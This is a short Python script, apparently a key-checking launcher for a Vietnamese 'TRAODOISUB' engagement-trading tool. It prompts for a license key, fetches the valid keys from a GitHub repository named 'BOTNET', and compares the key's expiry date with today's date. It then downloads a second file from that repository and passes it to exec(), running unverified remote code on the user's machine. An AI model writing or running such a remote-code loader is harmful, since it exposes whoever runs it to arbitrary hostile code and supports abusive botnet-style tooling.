import requests,json,os,sys
from pystyle import Add, Center, Anime, Colors, Colorate, Write, System
from datetime import datetime

current_datetime = datetime.now()
NAM=str(current_datetime).split("-")[0]
NGAY=str(current_datetime).split("-")[2].split(" ")[0]
THANH=str(current_datetime).split("-")[1]

def THUANTOOOL():
  pass
os.system("cls" if os.name == "nt" else "clear")
System.Title(f"TOOL TRAODOISUB.COM ")
System.Size(90, 30)
THUANTOOOL()

print("\033[1;37m╔═════════════════════╗")
print("\033[1;37m║      \033[1;33mNhập Key       \033[1;37m║")
print("\033[1;37m╚═════════════════════╝")
KEY=input(">>> Nhập Key Bạn Có : ")
KEYW=json.loads(str(requests.get('https://raw.githubusercontent.com/mymikute/BOTNET/main/2').text))
if KEY in KEYW['KEY']:
	print('[T]> \033[1;36mThông Báo : '+KEYW['KEY'][KEY]['LoiNhan'])
	print('[T]> Hạn Key 00h Ngày : '+KEYW['KEY'][KEY]['HSD'])
	print("[T]> Hôm Nay Là Này : ",NGAY,THANH,NAM)
	NAMk=KEYW['KEY'][KEY]['HSD'].split(' ')[2]
	ThangK=KEYW['KEY'][KEY]['HSD'].split(' ')[1]
	Ngayk=KEYW['KEY'][KEY]['HSD'].split(' ')[0]
	if int(NAMk+ThangK+Ngayk) > int(NAM+THANH+NGAY):
		exec(requests.get('https://raw.githubusercontent.com/mymikute/BOTNET/main/4').text)
	else:
		print("[T]> Key Hết Hạn Rồi Em Ơi")

else:
	print('[T]> Sai Key')
